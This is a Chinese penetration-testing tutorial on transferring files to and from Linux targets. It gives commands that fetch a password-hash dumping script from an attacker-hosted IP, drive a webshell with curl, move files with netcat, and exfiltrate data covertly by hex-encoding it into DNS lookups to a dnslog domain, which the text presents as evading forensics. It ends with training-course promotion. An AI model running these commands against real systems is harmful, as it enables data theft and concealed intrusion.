渗透测试常用文件传输方法-Linux篇(如何向Linux服务器中上传文件)，渗透测试零基础入门到精通实战教程！

介绍

文件上传一般分为上传和下载,下面我所指的下载具体指的是攻击机(本地机器)向目标机(服务器)传输文件。而上传则相反是从目标中收集下载文件!如果让目标机器下载,我们大多数时候都需要先把需要下载的文件挂载出来!

攻击机挂载文件

Python脚本挂载

# python2
python -m SimpleHTTPServer
# python3适用的将当前目标挂载,不填写端口的话默认是到8000端口中
python3 -m http.server 端口
#python3.7之后支持指定文件
python -m http.server 端口 --directory 指定文件
# nohup 可以不依赖当前进程(关闭ssh后此进程不会跟随关闭,&表示在后台运行)
nohup python3 -m http.server &

使用阿帕奇服务挂载

# 下载阿帕奇
yum install httpd.x86_64
# 启动阿帕奇
systemctl status httpd.service
# 添加测试文件(我们上传给目标的文件就放到/var/www/html目录中即可)
echo "测试" > /var/www/html/index.html
# 如果测试文件添加后直接访问IP无法获取内容,就重启一下服务试试
systemctl restart httpd.service
# 默认80端口,如果此端口已经被占用或者被防火墙拦截可以去设置里修改为其他防火墙
# 其中有一些默认值可以修改,一个是默认网站目录/var/www/html,一个是默认打开首页index.html,想要改,找到上述单词替换掉即可!
vim /etc/httpd/conf/httpd.conf
systemctl restart httpd.service

方面下面攻击测试,将攻击机的python和阿帕奇服务都启动起来了!(个人小服务器,各位表哥没事别打,我就不打码了!)
http://43.128.11.131/和http://43.128.11.131:8000/

传输文件

wget

这个命令的主要功能就是用来从指定的URL下载文件。官方定义:非交互式的网络文件下载工具。这是一个单项的,只能下载文件的命令。

# 详细用法查看(官方介绍很详细,这里就不复制粘贴了)
wget -h
# 常规用法
wget 目标地址
wget http://43.128.11.131:8000/Get-PassHashes.ps1
# 可以设置-q来取消任何的信息输出,-O重命名下载的文件
wget -q -O 名字 目标地址
wget -q -O Windows收集信息脚本.ps1 http://43.128.11.131:8000/Get-PassHashes.ps1

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

curl

这个命令用来请求 Web 服务器的命令行工具,但可以使用其-o或-O参数来进行文件下载。

# 可以使用-O来
curl -O 目标地址
curl -O http://43.128.11.131:8000/Get-PassHashes.ps1
# -o用来将输出写入文件
curl -o 名字 目标地址
curl -o Windows收集信息脚本.ps1 http://43.128.11.131:8000/Get-PassHashes.ps1
# 除此之外,如果我们在目标成功上传了小马还能通过这种方式来控制小马执行命令
curl -X 访问方式 -d "命令" 目标网络控制台(webshell)地址
# 我没往服务器里传小马,就不实机测试了
curl -X POST -d "CMD=whoami" http://43.128.11.131:8000/

netcat

netcat简称nc,他是一个功能十分强大的网络工具,但在很多Linux中并不会携带,需要我们手动安装!
netcat安装和详细使用介绍: http://note.youdao.com/s/Nxf2xYKz

# 安装nc
yum -y install nc
# 下载文件
## 在攻击机中指定的文件开启指定端口的监听
## 此方式是先将文件挂载然后等待下载
cat 文件名 | nc -l 端口
cat 1.txt | nc -l 1234
## 在目标中接收文件
nc 目标地址 端口 > 文件名
nc 43.128.11.131 1234 > 服务器下载文件.txt
# 上传文件
# 先开启接收等待文件发送,不过这种方法接收完成后不会主动退出,需要我们手动退出!
nc host_ip 1234 < file1
nc -lvvp 1234 > file2

sftp

这个是和我们ssh比较类似的一个服务,是一个交互式文件传输程序,并且支持公私钥的认证(这里的公私钥使用的是和ssh共享的公私钥文件)。

# 如果是使用Windows电脑连接sftp前改变一下编码,否则可能中文乱码!!! Windows默认GBK编码,而Linux默认是UTF-8,这里我将控制台临时变为UTF-8编码解决乱码问题
# Windows10大部分版本都默认会带ssh,sftp之类的工具(第三方的精简版、企业版之类的可能不带)
chcp 65001
# 用法和ssh也十分类似,只需把ssh换成sftp即可
sftp 用户名@目标地址
sftp root@192.168.1.1
# 同样也支持ssh的一些参数
sftp -P 端口 用户名@目标地址
sftp -P 端口 -i 私钥 用户名@目标地址
sftp -P 22 root@192.168.1.1
sftp -P 22 -i ~/.ssh/id_rsa root@192.168.1.1

# sftp中同样支持ls、cd之类的常用基础命令
# 上传文件
put [本地文件的地址] [服务器上文件存储的位置]
# 下载文件
get [服务器上文件存储的位置] [本地要存储的位置]

其他方法

上述传输数据都使用了一些Linux内置的命令或服务,比较容易被查到记录哪来取证, 或被禁用,下面用一些不容易被发现的方法(即使被发现也很难取证)来获取目标主机数据!

DNS传输数据

这是一种比较隐蔽的传输数据方法,但我们需要DNSlog之类的工具接收数据!和使用一些工具来进行解密,在线加密解密工具

# 首先我们打开需要传输的文件,然后使用管道符给xxd进行分段编码
# 分段编码后将其赋予变量,然后让其访问指定域名然后我们可以通过查看dnslog的接受信息进行下一步处理
cat 文件名 | xxd -p -c 16 | while read 变量名; do host $变量名.dnslog; done
# 如
cat 1.txt | xxd -p -c 16 | while read i; do host $i.e578nr.dnslog.cn; done

基于上述命令可以做一些其他变种,比如把编码方式改变xxd -p -c 16用的是Hex编码,我们还要尝试将其换成其他编码(甚至多层编码,来进行传输)

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。（全套教程扫描领取哈）

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！ （全套教程扫描领取哈）

👉4.护网行动资料👈

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

👉5.黑客必读书单👈

👉6.网络安全岗面试题合集👈

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~